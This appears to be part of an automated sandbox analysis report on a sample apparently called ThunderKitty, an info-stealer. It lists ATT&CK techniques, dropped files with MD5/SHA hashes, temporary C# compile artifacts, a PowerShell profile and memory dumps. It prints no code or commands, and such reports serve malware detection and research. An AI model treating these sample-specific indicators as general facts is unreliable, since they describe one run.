System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c18e55fadceb55c96c68877ca0b33128

SHA1
f58a6d92da219d09cb9fba8ddcaff2ad5e94dffa

SHA256
76286c774e5a232d707d4140991c150cd1053bbcb355e08ff88b9ea50fd1bc66

SHA512
4f52b8558d9daefc695ac6d9a0a6c605754e6363f9bf2d85b16732f367aac5e2e20d467d5b02559261954a01f4fdfbfa3c2a67955dbaa2e8c454cb1dc9947436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e621802b71e3ece88354ee557e1ce88

SHA1
0a7bb0acee1ebc8281bd24ef0084076e03f93e1f

SHA256
80a94ab0d20a51881a420cf64826b30e621d94245304be8b35af5cac389bc587

SHA512
31038c0107f0111eef87385a6ec7ef56ec9833fd5ef85187e58c9b32917ba8b90fb7c1bb2efbf273f1ee3a03744ca61d3f4d6f25029b9715eca216be2d80ef01

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8FEC.tmp

Filesize
1KB

MD5
f4df636cf127787d6af4fde8999984f4

SHA1
da54199f8d8ea79a9ef67eabb5676c0e3a93aa3a

SHA256
439f832a154c7febfedda353849d95aaa82b5968d844ea90ef9107932f4c97be

SHA512
0e801a5a81a9e555ef5c83e9f4d0b9de930446439130ba7eb3f7459bc55be7a24e5d040788083e8f19382ed954166702b9b6d0f6dfd6f08adf4dd70819ee94d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9134.tmp

Filesize
1KB

MD5
0c92586523e2b8b8d1760931187dc4b5

SHA1
a846b35ee53b4125abb5d3fe61ba6b9642fc7a0b

SHA256
e008878f1ad28ebcdad325554a20a1c6e0b9722e5fcdccd24996871760fcc5ea

SHA512
dcefed9046ff688dc98a45d694838a0ef71144114d65b96aa08e0eaa3976df042236a1f5f7e43d4c5ae20d56f0413759b3e9f9a0f1bd5d463fa816b35b37c056

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
89KB

MD5
aeef87bf827219d90c61460bb218199a

SHA1
2ed93cf473c3dc1f230fbe5cba24ab4b08d49ec1

SHA256
429dd61ff814530419aea1a8447a2126a549edbd1de767a51eaf98d22cf25197

SHA512
4df231105b5b5d56fb3ae9b677ffc2f9c3370bb726aa481492a4155c6c3fa8f026bbf553a5788aa74d376d1b39ff46fa1d86f8d206182648b8085ae27f0fa8db

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
22KB

MD5
988e361b50fed7f70b6cbcb037dec438

SHA1
a0ce72ab5ff79c7a66e37f36e151307affb223e2

SHA256
6680cc18e8fb40047b4c71330cdd96f66047ecb15308ff48ca63502bd7d34c6a

SHA512
9bc1f752a2263a55824b95ec0d258bb4cbed4e9141d5f92d4f2f3196f9228dea793cfeafe167306a4f8b614d70a1270730dd9e736e3006a12658c8ab604f6249

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i34rojum.xoo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a5e5tbtf\a5e5tbtf.dll

Filesize
4KB

MD5
955e937925b3cce5a6fa2f94a673b27d

SHA1
337a3443939351e7d9f13380c5fe43226951d36f

SHA256
81fed3245d0b6482b759506d58c68a7943152e9ea19c915a45afeb4b2f444e00

SHA512
97a08eb8f2f2e54974a6b7459b4a2e2f33d4b897d92b448375d9123f82d1ae0acadfbf85b3854a292d2eab9fabb1eb4034f5b2539e14c6bcc6e4c2df7c4e697e

Download Submit
C:\Users\Admin\AppData\Local\Temp\zp42yqip\zp42yqip.dll

Filesize
4KB

MD5
899537f60615464f2c9036568cb2e159

SHA1
ff18a272589e06ba01368a5e6409a8f4e014c275

SHA256
8dafe27c4ff770806ea3da47abc03cdb31c246be8a386570e19ebfa48a6f2146

SHA512
dcfcc3d858417267ed03f127e8e724f5ffad4a11fc83221c30705504c12e7999d8bca63f389588c1f88d0ff2ca8eae65a4dd65385f264501039223d4c33711ed

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5e5tbtf\CSCA13E0441171B4675BECE425EED3A8EC.TMP

Filesize
652B

MD5
a7387ff757e18734e5f844e5454321da

SHA1
63977a6ed2169fc5bedb215981eff9513356b9cf

SHA256
ee75c0d50de53e42cdde67fd3d45a4c0a3014d8fa39a9cf06a19db4a77722075

SHA512
bbf52310810edd96bdd0f75800521c956d628f3ca7cac9681f31aee4903d5aff04c7cc98540557c3831ad93f2a6a4a026f342d30ba177f3873b3828205a817ef

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5e5tbtf\a5e5tbtf.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5e5tbtf\a5e5tbtf.cmdline

Filesize
369B

MD5
6c207ad94f9efcb03e5506b67591c0ad

SHA1
98a3e753a12857f1d248796a294220376f354c1f

SHA256
dd49304d025cfc8b01aef16f305b5b0242a54f1787930660048310711e69d34e

SHA512
07a95d52e9c38ec370bf82db0ce3ce42dc57f32a8febfbfafc2762b156219f8bb74c8b5919501e87fb21a2ae66c2d53cb6462e5e3990219648f1f3ba80f5399a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zp42yqip\CSC799E89EB43014738B46538163E8E3BAE.TMP

Filesize
652B

MD5
dcaf2997aed44595c1e6e709a4492474

SHA1
91fd4d676fffed196c1b44f1352b4326f43969ad

SHA256
f23fab2fb7e68a5bb65d0995126cff664abe7377e9f7d8cffc6cb82b85f5239a

SHA512
9f3e3cef03152ccf844c90e96d26459fb1439607980968a33fdf3895ad60cd10d0e0255eb0854be99d5a3a515f1603e5f690dee984e13e231fe9476f721a740f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zp42yqip\zp42yqip.cmdline

Filesize
369B

MD5
ce8efaf6515a5eed43b437166d259782

SHA1
75f8d17a30c1668dbcaab66e43e5fe95bfa7125f

SHA256
392ac2311a3386fb511d4f3c42597b6c6b5159ffda4a3d93dc689b3aa06e28bc

SHA512
8230fc19163813fa83d49ab671fe0318bda6c974a37a391769d94de059527214d75b04a9b8ec51197318fd5cd467ca2dc75f4bf0b259bd4981f0d2985b0a14a5

Download Submit
memory/2720-90-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/2720-22-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/2720-7-0x0000016F24A00000-0x0000016F24A22000-memory.dmp

Filesize
136KB

Download
memory/2720-68-0x0000016F24BC0000-0x0000016F24BC8000-memory.dmp

Filesize
32KB

Download
memory/2720-21-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/2720-35-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/3520-84-0x000001DE5E210000-0x000001DE5E9B6000-memory.dmp

Filesize
7.6MB

Download
memory/3520-93-0x000001DE5DE40000-0x000001DE5DE6A000-memory.dmp

Filesize
168KB

Download
memory/3520-94-0x000001DE5DE40000-0x000001DE5DE64000-memory.dmp

Filesize
144KB

Download
memory/3520-127-0x000001DE5DE40000-0x000001DE5DE52000-memory.dmp

Filesize
72KB

Download
memory/3520-128-0x000001DE5DCF0000-0x000001DE5DCFA000-memory.dmp

Filesize
40KB

Download
memory/3520-81-0x000001DE43340000-0x000001DE43348000-memory.dmp

Filesize
32KB

Download
memory/4876-0-0x00007FFD3ADA3000-0x00007FFD3ADA5000-memory.dmp

Filesize
8KB

Download
memory/4876-29-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/4876-70-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download
memory/4876-1-0x00007FFD3ADA0000-0x00007FFD3B861000-memory.dmp

Filesize
10.8MB

Download